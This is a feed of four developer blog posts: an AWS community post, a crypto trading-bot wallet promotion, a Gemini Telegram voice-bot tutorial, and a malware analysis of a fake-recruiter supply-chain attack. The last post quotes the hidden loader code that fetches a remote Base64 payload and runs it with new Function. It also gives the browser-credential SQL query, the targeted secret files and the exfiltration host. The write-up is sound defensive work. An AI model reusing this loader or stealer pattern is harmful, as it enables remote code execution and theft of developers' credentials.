2026-04-16 23:06:54
🚀 From Community to Impact: My Journey as a Cloud Club Captain & AWS Community Builder
My journey in the AWS ecosystem started as a member of the AWS UG Bogotá, where I discovered the real power of tech communities.
That experience led me to become the Captain of the AWS Cloud Club at EAN University, where I’ve been focused on building opportunities for students through cloud computing, collaboration, and real-world exposure.
Recently, we had the opportunity to participate in Santux 2026 at Universidad Santo Tomás - Seccional Tunja, where we reached:
💥 400+ in-person students
During this session, we explored how communities are transforming the relationship between academia and industry, and how AWS enables students to accelerate their careers.
But beyond the talk, what truly matters is the impact:
🤝 We supported Manuel Galindo, a passionate student, to start his own AWS Cloud Club in his university — expanding the ecosystem and empowering more students.
This is what being an AWS Community Builder means to me:
Not just growing within the ecosystem myself, but enabling others to grow with it.
We are not just building communities.
We are building the future of tech talent.
2026-04-16 23:05:32
Trading bot developers face a critical challenge: managing transaction nonces across multiple blockchains while maintaining execution speed and preventing costly failed transactions. When your arbitrage bot spots an opportunity across Ethereum and Solana simultaneously, nonce conflicts can mean the difference between profit and loss.
Your trading bot operates in microseconds, but blockchain nonces operate in sequential order. Send two Ethereum transactions with the same nonce? The second fails. Skip a nonce? Your transaction gets stuck behind the gap. Worse, when running multi-chain strategies, you're juggling separate nonce sequences across EVM networks while Solana uses an entirely different transaction model with recent blockhashes.
Most trading bots hack together nonce management with local counters and prayer. When network congestion hits or your bot restarts mid-sequence, those counters desync from reality. Your profitable arbitrage opportunity becomes a series of failed transactions and wasted gas fees.
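To make that failure mode concrete, here is a minimal Python sketch (illustrative only, not WAIaaS or any real bot's code) of a local nonce counter drifting out of sync with the chain after a restart:

```python
class NaiveNonceCounter:
    """Local counter a bot might keep in memory. State is lost on restart."""

    def __init__(self, start: int) -> None:
        self.next_nonce = start

    def allocate(self) -> int:
        nonce = self.next_nonce
        self.next_nonce += 1
        return nonce


# Bot boots, reads nonce 10 from the chain, sends two transactions.
counter = NaiveNonceCounter(start=10)
sent = [counter.allocate(), counter.allocate()]  # nonces 10 and 11

# Bot crashes and restarts while the nonce-11 tx is still pending.
# The chain's confirmed nonce is 11 (only tx 10 landed), so the bot
# re-reads 11 and allocates it again, colliding with the pending tx.
counter = NaiveNonceCounter(start=11)
duplicate = counter.allocate()  # 11 again: the second send will fail
```

The collision happens because the chain only reports confirmed nonces; any pending, unconfirmed transactions are invisible to a freshly restarted counter.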
WAIaaS handles nonce management automatically across 18 networks through its 7-stage transaction pipeline. When your trading bot submits multiple transactions, the pipeline queues them correctly and maintains nonce sequences without conflicts.
The system tracks nonce state per network, automatically increments for pending transactions, and handles the complexity of EVM vs Solana transaction models. Your bot focuses on trading logic while WAIaaS ensures reliable execution.
# Check current nonce state
curl http://127.0.0.1:3100/v1/wallet/nonce \
-H "Authorization: Bearer wai_sess_<token>"
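Conceptually, the per-network tracking described above works like a thread-safe allocator keyed by network. This is an illustrative Python sketch of the idea, not WAIaaS internals:

```python
import threading


class NonceAllocator:
    """Illustrative per-network nonce state: next available nonce per network."""

    def __init__(self) -> None:
        self._lock = threading.Lock()
        self._state: dict[str, int] = {}  # network -> next available nonce

    def sync(self, network: str, chain_nonce: int) -> None:
        """Resync from the chain; never move backwards past pending allocations."""
        with self._lock:
            self._state[network] = max(self._state.get(network, 0), chain_nonce)

    def allocate(self, network: str) -> int:
        """Hand out the next nonce and increment for the pending transaction."""
        with self._lock:
            nonce = self._state.setdefault(network, 0)
            self._state[network] = nonce + 1
            return nonce


allocator = NonceAllocator()
allocator.sync("ethereum-mainnet", 42)
first = allocator.allocate("ethereum-mainnet")   # 42
second = allocator.allocate("ethereum-mainnet")  # 43
```

The `max()` in `sync()` is the important detail: a chain resync can never hand back a nonce that was already allocated to a pending transaction.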
Here's how your arbitrage bot executes a cross-chain strategy without nonce headaches:
# Step 1: Swap SOL → USDC on Jupiter (Solana)
curl -X POST http://127.0.0.1:3100/v1/actions/jupiter-swap/swap \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"inputMint": "So11111111111111111111111111111111111111112",
"outputMint": "EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v",
"amount": "1000000000"
}'
# Step 2: Bridge USDC to Ethereum via LI.FI
curl -X POST http://127.0.0.1:3100/v1/actions/lifi/bridge \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"fromChain": "sol",
"toChain": "eth",
"fromToken": "EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v",
"toToken": "0xA0b86a33E6411A3d8a8269B7f9C86dfE8b68b2A0",
"amount": "100000000"
}'
# Step 3: Execute on Ethereum DeFi (WAIaaS manages nonce automatically)
curl -X POST http://127.0.0.1:3100/v1/transactions/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"type": "ContractCall",
"to": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D",
"data": "0x...",
"value": "0"
}'
Each transaction gets the correct nonce automatically. No local state tracking, no race conditions, no failed transactions from nonce gaps.
Trading bots need gas optimization built-in. WAIaaS includes gas conditional execution — your transactions only execute when gas prices meet your thresholds:
# Only execute when gas < 20 gwei
curl -X POST http://127.0.0.1:3100/v1/transactions/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"type": "TRANSFER",
"to": "0x...",
"amount": "0.1",
"gasCondition": {
"maxGasPrice": "20000000000"
}
}'
The transaction pipeline queues your trade and waits for favorable gas conditions. Your MEV bot captures opportunities without overpaying for execution.
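The queue-and-wait behavior can be sketched as a simple polling loop. This is hypothetical code with a stubbed gas feed, not the actual pipeline:

```python
import time
from typing import Callable


def execute_when_gas_below(
    max_gas_price_wei: int,
    get_gas_price: Callable[[], int],
    send_tx: Callable[[], str],
    poll_interval: float = 1.0,
) -> str:
    """Block until the gas price meets the threshold, then send."""
    while True:
        if get_gas_price() <= max_gas_price_wei:
            return send_tx()
        time.sleep(poll_interval)


# Stubbed feed: gas falls from 35 to 25 to 18 gwei across polls.
prices = iter([35_000_000_000, 25_000_000_000, 18_000_000_000])
tx_hash = execute_when_gas_below(
    max_gas_price_wei=20_000_000_000,  # 20 gwei, matching the example above
    get_gas_price=lambda: next(prices),
    send_tx=lambda: "0xabc",
    poll_interval=0.0,
)
```

In the sketch, the first two polls see 35 and 25 gwei and keep waiting; the third sees 18 gwei, passes the threshold, and the transaction goes out.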
High-frequency trading requires transaction batching. WAIaaS handles nonce sequencing across batch operations:
curl -X POST http://127.0.0.1:3100/v1/transactions/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"type": "Batch",
"transactions": [
{
"type": "Approve",
"spender": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D",
"token": "0xA0b86a33E6411A3d8a8269B7f9C86dfE8b68b2A0",
"amount": "1000000000"
},
{
"type": "ContractCall",
"to": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D",
"data": "0x38ed1739..."
}
]
}'
The approve gets nonce N, the swap gets nonce N+1. No manual nonce calculation required.
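The sequencing rule is simple to state in code. An illustrative helper, not part of the WAIaaS API:

```python
def assign_nonces(start_nonce: int, transactions: list[dict]) -> list[dict]:
    """Give each transaction in a batch the next sequential nonce."""
    return [
        {**tx, "nonce": start_nonce + i} for i, tx in enumerate(transactions)
    ]


batch = [{"type": "Approve"}, {"type": "ContractCall"}]
sequenced = assign_nonces(7, batch)
# The approve gets nonce 7, the contract call gets nonce 8.
```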
For sophisticated trading strategies, WAIaaS supports ERC-4337 Account Abstraction with UserOp bundling. Your bot can execute gasless transactions or pay gas in tokens:
# Build UserOp with automatic nonce management
curl -X POST http://127.0.0.1:3100/v1/userop/build \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"callData": "0x...",
"target": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"
}'
Trading bots need guardrails. WAIaaS includes 21 policy types with 4 security tiers. Set spending limits, rate limits, and contract whitelists:
# Create trading bot policy
curl -X POST http://127.0.0.1:3100/v1/policies \
-H "Content-Type: application/json" \
-H "X-Master-Password: <password>" \
-d '{
"walletId": "<wallet-uuid>",
"type": "SPENDING_LIMIT",
"rules": {
"instant_max_usd": 1000,
"daily_limit_usd": 50000,
"hourly_limit_usd": 10000
}
}'
npm install -g @waiaas/cli
waiaas init --auto-provision
waiaas start
waiaas wallet create --name "trading-eth" --chain evm --network ethereum-mainnet
waiaas wallet create --name "trading-sol" --chain solana --network solana-mainnet
# Returns session tokens for API auth
waiaas session create --wallet trading-eth
waiaas session create --wallet trading-sol
# Configure risk limits
waiaas policy create --wallet trading-eth --type SPENDING_LIMIT \
--rule instant_max_usd=500 --rule daily_limit_usd=10000
import { WAIaaSClient } from '@waiaas/sdk';
const client = new WAIaaSClient({
baseUrl: 'http://127.0.0.1:3100',
sessionToken: process.env.WAIAAS_SESSION_TOKEN,
});
// WAIaaS handles nonces automatically
const swap = await client.executeAction('jupiter-swap', 'swap', {
inputMint: 'So11111111111111111111111111111111111111112',
outputMint: 'EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v',
amount: '1000000000'
});
Your trading bot now has enterprise-grade wallet infrastructure with automatic nonce management, gas optimization, and risk controls across 18 networks. No more failed transactions from nonce conflicts — just reliable execution for profitable trading.
Ready to eliminate nonce headaches from your trading infrastructure? Clone WAIaaS from GitHub and deploy your production-ready trading bot wallet in minutes. Check out the full documentation and examples at waiaas.ai.
2026-04-16 23:03:04
What if your Telegram bot could listen?
Not just read text — actually understand voice messages, reason about them, and talk back with a natural-sounding voice. That's what we're building today: a Telegram bot powered by Google's Gemini API that handles both text and voice, with multi-turn memory and text-to-speech replies.
Here's what it looks like in action:
All in about 400 lines of Python. Let's build it.
You'll need `ffmpeg` installed (`brew install ffmpeg` on macOS, `apt-get install ffmpeg` on Linux).
Create a new directory and set up the basics:
mkdir telegram-gemini-voice-bot && cd telegram-gemini-voice-bot
# Create a virtual environment
python -m venv .venv && source .venv/bin/activate
# Install dependencies
pip install 'python-telegram-bot[webhooks]~=21.11' 'google-genai>=1.55.0' 'pydub~=0.25'
Create a .env file with your credentials:
# .env
TELEGRAM_BOT_TOKEN=your-telegram-bot-token
GOOGLE_API_KEY=your-google-api-key
TELEGRAM_SECRET_TOKEN=generate-a-random-string-here
VOICE_ENABLED=true
Create bot.py and start with imports and config:
import base64
import io
import logging
import os
import wave
from google import genai
from pydub import AudioSegment
from telegram import Update
from telegram.ext import (
Application,
CommandHandler,
ContextTypes,
MessageHandler,
filters,
)
# Config
TELEGRAM_BOT_TOKEN = os.environ["TELEGRAM_BOT_TOKEN"]
GOOGLE_API_KEY = os.environ["GOOGLE_API_KEY"]
WEBHOOK_URL = os.environ.get("WEBHOOK_URL", "")
TELEGRAM_SECRET_TOKEN = os.environ.get("TELEGRAM_SECRET_TOKEN")
PORT = int(os.environ.get("PORT", "8080"))
REASONING_MODEL = "gemini-3.1-flash-lite-preview"
TTS_MODEL = "gemini-3.1-flash-tts-preview"
TTS_VOICE = "Kore"
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
# Initialize the Gemini client
gemini_client = genai.Client(api_key=GOOGLE_API_KEY)
We're using two Gemini models: `gemini-3.1-flash-lite-preview` for understanding and reasoning, and `gemini-3.1-flash-tts-preview` for text-to-speech.
The Interactions API is Gemini's unified interface. Instead of juggling generateContent and manually tracking conversation history, you call interactions.create() and pass a previous_interaction_id for multi-turn — the server handles the rest.
Here's the core function that sends text or audio to Gemini:
# Track conversation state (in-memory, resets on restart)
last_interaction_ids: dict[int, str] = {} # chat_id → interaction ID
async def gemini_interact(
chat_id: int,
text: str | None = None,
audio_bytes: bytes | None = None,
) -> str:
"""Send text or audio to Gemini, return the text response."""
input_parts: list = []
if audio_bytes is not None:
# Encode audio as base64 for the API
audio_b64 = base64.b64encode(audio_bytes).decode("utf-8")
input_parts.append(
{"type": "audio", "data": audio_b64, "mime_type": "audio/ogg"}
)
input_parts.append(
{"type": "text", "text": "Listen to this voice message and respond helpfully."}
)
if text is not None:
input_parts.append({"type": "text", "text": text})
# Simplify input if it's just a single text part
if len(input_parts) == 1 and input_parts[0]["type"] == "text":
input_value = input_parts[0]["text"]
else:
input_value = input_parts
kwargs = {
"model": REASONING_MODEL,
"input": input_value,
"system_instruction": (
"You are a helpful, concise AI assistant on Telegram. "
"Keep responses short and informative. "
"Always respond in the same language the user writes or speaks in."
),
}
# Chain to previous interaction for multi-turn context
prev_id = last_interaction_ids.get(chat_id)
if prev_id:
kwargs["previous_interaction_id"] = prev_id
interaction = gemini_client.interactions.create(**kwargs)
# Store this interaction's ID for the next turn
last_interaction_ids[chat_id] = interaction.id
return interaction.outputs[-1].text or "(No response generated)"
What's happening here:
- We attach the audio part alongside a text prompt telling the model what to do.
- We store the `interaction.id` from each response and pass it as `previous_interaction_id` on the next call. The server keeps the full conversation history — we don't need to.

Gemini's TTS model returns raw PCM audio. Telegram voice messages require OGG/Opus format. So we need a conversion pipeline:
Text → Gemini TTS → raw PCM (24kHz, 16-bit, mono) → WAV → OGG/Opus → Telegram
Here's the implementation:
async def gemini_tts(text: str) -> bytes:
"""Convert text to OGG/Opus audio bytes via Gemini TTS."""
interaction = gemini_client.interactions.create(
model=TTS_MODEL,
input=text,
response_modalities=["AUDIO"],
generation_config={
"speech_config": {
"voice": TTS_VOICE.lower(),
}
},
)
# Extract PCM audio from response
pcm_audio = None
for output in interaction.outputs:
if output.type == "audio":
pcm_audio = base64.b64decode(output.data)
break
if pcm_audio is None:
raise RuntimeError("No audio output from TTS")
# Convert raw PCM → WAV (pydub needs a container format)
wav_buffer = io.BytesIO()
with wave.open(wav_buffer, "wb") as wav_file:
wav_file.setnchannels(1) # mono
wav_file.setsampwidth(2) # 16-bit
wav_file.setframerate(24000) # 24kHz
wav_file.writeframes(pcm_audio)
wav_buffer.seek(0)
audio_segment = AudioSegment.from_wav(wav_buffer)
# WAV → OGG/Opus (Telegram's required format for voice messages)
ogg_buffer = io.BytesIO()
audio_segment.export(ogg_buffer, format="ogg", codec="libopus")
ogg_buffer.seek(0)
return ogg_buffer.read()
The key detail: Gemini TTS returns raw PCM samples at 24kHz, 16-bit, mono. We wrap it in a WAV header using Python's wave module, then use pydub (which calls ffmpeg under the hood) to re-encode as OGG/Opus — the format Telegram expects for reply_voice().
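Those numbers pin down the byte math: 24,000 samples/s × 2 bytes/sample × 1 channel = 48,000 bytes per second of audio. A quick sanity check:

```python
SAMPLE_RATE = 24_000   # Hz, per Gemini TTS output
SAMPLE_WIDTH = 2       # bytes (16-bit samples)
CHANNELS = 1           # mono


def pcm_duration_seconds(pcm: bytes) -> float:
    """Duration of a raw PCM buffer in the Gemini TTS output format."""
    return len(pcm) / (SAMPLE_RATE * SAMPLE_WIDTH * CHANNELS)


# One second of silence is exactly 48,000 bytes.
assert pcm_duration_seconds(b"\x00" * 48_000) == 1.0
```

This is handy for logging how long a generated voice reply is before sending it.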
💡 Inline audio tags: Gemini TTS supports inline audio tags — square-bracket modifiers you can embed directly in your transcript to control delivery. For example, `[whispers]`, `[laughs]`, `[excited]`, `[sighs]`, or `[shouting]`. You can use these in the text you pass to TTS to make responses more expressive: `"[laughs] Oh that's a great question! [whispers] Let me tell you a secret..."` There's no fixed list — the model understands a wide range of emotions and expressions like `[sarcastic]`, `[panicked]`, `[curious]`, and more.
Find a Gemini TTS prompting guide here: https://dev.to/googleai/how-to-prompt-gemini-31s-new-text-to-speech-model-24bb
Now wire it all together with Telegram's handler system. We need two handlers: one for text, one for voice.
async def handle_text(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""Handle incoming text messages."""
chat_id = update.effective_chat.id
user_text = update.message.text
logger.info("Text message from chat %s: %s", chat_id, user_text[:100])
# Show typing indicator
await update.message.chat.send_action("typing")
# Get Gemini response
response_text = await gemini_interact(chat_id, text=user_text)
# Always send text
await update.message.reply_text(response_text)
# Also send voice reply
try:
await update.message.chat.send_action("record_voice")
ogg_audio = await gemini_tts(response_text)
await update.message.reply_voice(voice=ogg_audio)
except Exception as e:
logger.error("TTS failed: %s", e)
async def handle_voice(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""Handle incoming voice messages."""
chat_id = update.effective_chat.id
logger.info("Voice message from chat %s", chat_id)
await update.message.chat.send_action("typing")
# Download voice file from Telegram (already in OGG/Opus format)
voice = update.message.voice
voice_file = await voice.get_file()
audio_bytes = await voice_file.download_as_bytearray()
# Send audio directly to Gemini — it understands OGG natively
response_text = await gemini_interact(chat_id, audio_bytes=bytes(audio_bytes))
# Send text response
await update.message.reply_text(response_text)
# Send voice response
try:
await update.message.chat.send_action("record_voice")
ogg_audio = await gemini_tts(response_text)
await update.message.reply_voice(voice=ogg_audio)
except Exception as e:
logger.error("TTS failed: %s", e)
The beautiful thing here: Telegram voice messages are already OGG/Opus, and Gemini understands that format directly. No transcoding needed on input — we just pass the raw bytes.
Finally, set up the application with both polling (local dev) and webhook (production) support:
async def start_command(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Reply to /start (minimal handler; the greeting text is illustrative)."""
    await update.message.reply_text(
        "Hi! Send me a text or voice message and I'll reply with text and voice."
    )

def main() -> None:
    """Start the bot."""
    app = Application.builder().token(TELEGRAM_BOT_TOKEN).build()
    # Register handlers
    app.add_handler(CommandHandler("start", start_command))
    app.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, handle_text))
    app.add_handler(MessageHandler(filters.VOICE, handle_voice))
if WEBHOOK_URL:
# Webhook mode (production / Cloud Run)
logger.info("Starting webhook on port %s → %s", PORT, WEBHOOK_URL)
app.run_webhook(
listen="0.0.0.0",
port=PORT,
url_path="webhook",
webhook_url=f"{WEBHOOK_URL}/webhook",
secret_token=TELEGRAM_SECRET_TOKEN,
)
else:
# Polling mode (local dev — no public URL needed)
logger.info("Starting polling mode (no WEBHOOK_URL set)")
app.run_polling(allowed_updates=Update.ALL_TYPES)
if __name__ == "__main__":
main()
Polling vs. Webhook: polling is for local development (no public URL needed), while webhook mode is what you want in production. The python-telegram-bot library handles webhook registration automatically via run_webhook().

# Load environment variables
export $(cat .env | xargs)
# Start in polling mode (no WEBHOOK_URL = polling)
python bot.py
Open Telegram, find your bot, and send it a voice message. You should get back a text reply and a spoken response. 🎉
Want this running 24/7 with scale-to-zero? Here's the Dockerfile:
FROM python:3.12-slim
# Install ffmpeg for audio conversion (WAV → OGG/Opus)
RUN apt-get update && \
apt-get install -y --no-install-recommends ffmpeg && \
rm -rf /var/lib/apt/lists/*
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY bot.py .
ENV PORT=8080
EXPOSE 8080
CMD ["python", "bot.py"]
Step 1: Configure gcloud and Enable APIs
First, make sure your gcloud CLI is configured with the right project:
gcloud init --skip-diagnostics
Enable the required APIs — Secret Manager for storing credentials and Cloud Build for building your container:
gcloud services enable secretmanager.googleapis.com
gcloud services enable cloudbuild.googleapis.com
Never put API keys in environment variables directly. Use Secret Manager:
echo -n "$(grep TELEGRAM_BOT_TOKEN .env | cut -d '=' -f2)" | \
gcloud secrets create TELEGRAM_BOT_TOKEN --data-file=-
echo -n "$(grep GOOGLE_API_KEY .env | cut -d '=' -f2)" | \
gcloud secrets create GOOGLE_API_KEY --data-file=-
echo -n "$(openssl rand -base64 32)" | \
gcloud secrets create TELEGRAM_SECRET_TOKEN --data-file=-
Note: The
echo -nflag strips the trailing newline so it's not included in the stored secret. If you see a%at the end of the output when echoing — that's just zsh indicating no trailing newline, not part of your secret.
Cloud Run source deploys use the default Compute Engine service account to build and run your container. This account needs three additional roles that aren't granted by default:
# Get your project number
PROJECT_NUMBER=$(gcloud projects describe $(gcloud config get-value project) \
--format='value(projectNumber)')
# Allow the service account to build containers
gcloud projects add-iam-policy-binding $(gcloud config get-value project) \
--member="serviceAccount:${PROJECT_NUMBER}[email protected]" \
--role="roles/cloudbuild.builds.builder"
# Allow it to read uploaded source code from Cloud Storage
gcloud projects add-iam-policy-binding $(gcloud config get-value project) \
--member="serviceAccount:${PROJECT_NUMBER}[email protected]" \
--role="roles/storage.objectViewer"
# Allow it to access secrets at runtime
gcloud projects add-iam-policy-binding $(gcloud config get-value project) \
--member="serviceAccount:${PROJECT_NUMBER}[email protected]" \
--role="roles/secretmanager.secretAccessor"
Why are these needed? The default Compute Engine service account has the roles/editor role, but Editor doesn't include Cloud Build execution, fine-grained Cloud Storage read access, or Secret Manager access. This is a one-time setup per project.
gcloud run deploy telegram-gemini-bot \
--source . \
--region us-central1 \
--allow-unauthenticated \
--set-secrets="TELEGRAM_BOT_TOKEN=TELEGRAM_BOT_TOKEN:latest,GOOGLE_API_KEY=GOOGLE_API_KEY:latest,TELEGRAM_SECRET_TOKEN=TELEGRAM_SECRET_TOKEN:latest" \
--no-cpu-throttling
Note on --no-cpu-throttling: This tells Cloud Run to keep the CPU active even after the initial response is sent. Since the bot needs to process TTS and send a voice reply after acknowledging the message, this prevents the CPU from being throttled, which would otherwise cause the voice reply to be delayed or stall until the next message arrives.
Notice there's no WEBHOOK_URL here — and that's fine. The bot detects Cloud Run automatically via the K_SERVICE environment variable (which Cloud Run always sets) and starts the HTTP server on port 8080. It just won't register a webhook with Telegram yet, so it won't receive messages until Step 5.
Grab the actual service URL from the deploy output, then update the service:
gcloud run services update telegram-gemini-bot \
--region us-central1 \
--update-env-vars="WEBHOOK_URL=https://telegram-gemini-bot-xxxxx-uc.a.run.app"
Cloud Run gives you HTTPS, auto-scaling, and scale-to-zero — you only pay when someone actually messages the bot.
| Error | Cause | Fix |
|---|---|---|
| `PERMISSION_DENIED: Build failed because the default service account is missing required IAM permissions` | Compute Engine service account lacks Cloud Build permissions | Grant `roles/cloudbuild.builds.builder` and `roles/storage.objectViewer` (see Step 3) |
| `Permission denied on secret` | Service account can't access Secret Manager | Grant `roles/secretmanager.secretAccessor` (see Step 3) |
| `API [secretmanager.googleapis.com] not enabled` | Secret Manager API hasn't been turned on | Run `gcloud services enable secretmanager.googleapis.com` |
| `API [cloudbuild.googleapis.com] not enabled` | Cloud Build API hasn't been turned on | Say Y when prompted, or run `gcloud services enable cloudbuild.googleapis.com` |
| Voice replies are slow or delayed | CPU is being throttled after the text response | Deploy with `--no-cpu-throttling` to keep CPU active for background tasks |
Traditional chatbot APIs make you manage the conversation history. You send the full history on every request, and your token costs grow with every turn.
The Interactions API flips this. You pass previous_interaction_id and the server keeps the context:
# Turn 1
i1 = client.interactions.create(model="gemini-3.1-flash-lite-preview", input="Hi, I'm Alex")
# Turn 2 — server remembers "Alex"
i2 = client.interactions.create(
model="gemini-3.1-flash-lite-preview",
input="What's my name?",
previous_interaction_id=i1.id # ← that's it
)
In our bot, we key this by chat_id, so each Telegram chat gets its own conversation thread.
Gemini understands audio natively. No whisper, no transcription step, no intermediate text. We send the OGG bytes directly:
input_parts = [
{"type": "audio", "data": audio_b64, "mime_type": "audio/ogg"},
{"type": "text", "text": "Listen and respond helpfully."},
]
This means the model hears tone, emphasis, and language — not just words. It can respond in the same language the user speaks, detect questions vs. statements, and pick up on nuance that'd be lost in transcription.
We use two different models for two different jobs:
| Job | Model | Why |
|---|---|---|
| Understanding + reasoning | `gemini-3.1-flash-lite-preview` | Cheapest, fastest — ideal for a chatbot |
| Text-to-speech | `gemini-3.1-flash-tts-preview` | Purpose-built for natural speech synthesis |
This is cheaper and better than using a single model for both. Flash Lite handles the thinking, TTS handles the speaking.
The full source code extends this with:
- `/voice on|off` to control TTS responses
- `/language Spanish` to set the translation target

These are all just variations on the same `gemini_interact()` function with different `system_instruction` values. The core voice pipeline stays the same.
TL;DR: Gemini's Interactions API makes voice bots surprisingly simple. Audio goes in as base64, text comes out, TTS converts it back to speech. The server tracks conversation state so you don't have to. Add a Dockerfile and you've got a production-ready voice assistant on Cloud Run.
Happy hacking! 🚀
2026-04-16 23:03:01
Last week I caught a sophisticated supply-chain attack targeting developers before it could execute. I want to document exactly how it worked so you can recognize it if it comes for you.
A LinkedIn connection request from Andre Tiedemann, claiming to be CEO of a Web3 startup called Pass App. Profile looked legitimate — blue verification checkmark, 377 connections, 12 years at Airbus in his work history, proper headshot.
The pitch was standard: Engineering Manager role, decentralized platform, crypto payments integration. He asked screening questions, requested my CV, and scheduled a 4PM CET interview for the next day.
Then, without waiting for confirmation, he sent this:
"I shared a demo project: https://bitbucket.org/welcome-air/welcome-nest/src/main/ — Try setting it up locally, it'll help you get a better feel for how everything's structured. Please review our project and share your opinions on our meeting."
The meeting never happened. That was the entire point — get the repo cloned and executed before any scrutiny.
The repository was a clean, realistic React/Node.js fullstack project. Proper folder structure, reasonable code, nothing obviously wrong on a quick scroll.
Two files had been surgically modified:
server/config/config.js — added three innocuous-looking exports:
exports.locationToken = "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9VVkVYSA==";
exports.setApiKey = (s) => { return atob(s); };
exports.verify = (api) => { return axios.get(api); };
locationToken is a Base64 string that decodes to https://www.jsonkeeper.com/b/UVEXH — a third-party JSON hosting service used as a payload staging server.
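Decoding the string takes one line of Python; this is how you can confirm for yourself where the "API key" actually points:

```python
import base64

# The Base64 blob lifted from server/config/config.js
location_token = "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9VVkVYSA=="

# Decode it offline — never fetch a suspicious URL from your real machine
staging_url = base64.b64decode(location_token).decode("utf-8")
print(staging_url)  # https://www.jsonkeeper.com/b/UVEXH
```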
server/routes/auth.js — an IIFE injected at the top:
(async () => {
verify(setApiKey(locationToken))
.then(response => {
new Function("require", Buffer.from(response.data.model, 'base64').toString('utf8'))(require);
})
.catch(error => { });
})();
On server start, this silently fetches the remote payload, Base64-decodes it, and executes it via new Function() — passing require so it has full Node.js access. The catch block swallows all errors silently.
The payload fetched from jsonkeeper.com was a 2.8MB RC4-obfuscated JavaScript file — 17,278 encrypted string array entries, 508,646 array rotations, 119 wrapper decode functions. Not something you reverse by reading it.
First thing it does after decoding itself: check if it's running in an analysis environment.
// Sandbox detection
{}.constructor("return this")() // behaves differently in vm.createContext
// WSL detection
process.env.WSL_DISTRO_NAME
fs.readFileSync('/proc/version').includes('microsoft')
// Debugger detection + VM heuristics
If it passes those checks, it silently installs four npm packages:
npm install sql.js socket.io-client form-data axios --no-save --loglevel silent
--no-save means nothing appears in package.json. --loglevel silent suppresses all output. Then it spawns three background processes and gets to work.
I executed the payload in an isolated sandbox VM with no access to real credentials or production systems. Here's what it would have gone after on a real machine.
Browsers targeted (13): Chrome, Firefox, Brave, Edge, Opera, Opera GX, Vivaldi, Yandex, Kiwi, Iridium, Comodo Dragon, SRWare Iron, Chromium.
For Chromium-based browsers it runs direct SQLite queries against Login Data:
SELECT origin_url, username_value, password_value FROM logins
Passwords are decrypted using platform key extraction (DPAPI on Windows, AES-GCM on Linux/macOS).
For Firefox it targets both logins.json AND key4.db — with both files together all stored passwords are fully decryptable offline.
It also targets:
- `~/.ssh/`
- `~/.aws/credentials`
- `~/.docker/config.json`
- Files matching `.env`, `password`, `token`, `secret`, `api_key`, `wallet`, `.sqlite`
- The macOS keychain (`login.keychain-db`)

Everything gets exfiltrated to 216.126.225.243 (Ogden, Utah — bulletproof hosting on AS46664 VolumeDrive) via Socket.IO on port 8087 and HTTP uploads on ports 8085/8086.
Pass App was a real company that shut down on December 16, 2025. They had 10.4K Twitter followers and announced their closure publicly. Their website went offline. Their LinkedIn presence went dormant.
Four months later, the attacker hijacked that abandoned identity. The LinkedIn company page still had 585 followers and looked active. The real company's credibility became the attacker's cover.
One tell: Andre's pitch described Pass App as "a decentralized Airbnb-style platform" — completely different from the real product (an AI crypto wallet). The attacker's script hadn't been updated to match the brand they stole.
This is a known campaign called "Contagious Interview" (also tracked as "Dev Recruiter"). It has been running since at least 2023 and is attributed to DPRK-linked threat actors — specifically Lazarus Group / TraderTraitor. The goal is financially motivated: cloud credentials, crypto wallets, and SSH keys to pivot into production infrastructure.
The malware family is consistent with BeaverTail (the obfuscated JS infostealer) and InvisibleFerret (the Python-based backdoor that sometimes follows it).
The ukey: 506 field in the C2 registration event suggests at least 506 active operator accounts in this campaign's infrastructure.
Code review before running anything. The locationToken export looked odd — why is an API key Base64-encoded inline in config? Decoded it, saw jsonkeeper.com, fetched the URL, got a 2.8MB JSON blob with a model field.
I never ran it on my machine. I spun up an isolated VM instead.
| Signal | What it meant |
|---|---|
| Contact email is `@hotmail.com` with random suffix | Not a company domain — fake or hijacked account |
| LinkedIn connection made the day before the attack | Purpose-built connection, not a real relationship |
| Company website returns "Server Not Found" | No legitimate business behind the persona |
| Meeting scheduled but never confirmed | Meeting was only a pretext to get the repo run |
| Repo delivered before meeting acceptance | Urgency tactic — get it executed before scrutiny |
| Product description doesn't match company | Attacker's script wasn't updated for the stolen brand |
Never run npm install on a repo from someone you just met online without reading every file in package.json scripts, every entry point, and especially any files that run on startup.
Use a disposable VM for any externally-provided code. No SSH agent forwarding. No access to ~/.aws or ~/.docker. Snapshot before, delete after.
Check the company website. If it's down, walk away.
A recruiter email that doesn't match their company domain is a hard stop.
If you've recently cloned a repo from a LinkedIn recruiter and ran it on your real machine — check your ~/.ssh/, .env files, and browser credentials immediately. Look for lock files matching {tmpdir}/pid.*.lock. If you find them, assume full compromise.
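A quick way to check for those lock files from Python; the `pid.*.lock` pattern comes straight from the payload behavior described above:

```python
import glob
import os
import tempfile


def find_suspicious_locks() -> list[str]:
    """Look for the {tmpdir}/pid.*.lock files this payload drops."""
    pattern = os.path.join(tempfile.gettempdir(), "pid.*.lock")
    return sorted(glob.glob(pattern))


hits = find_suspicious_locks()
if hits:
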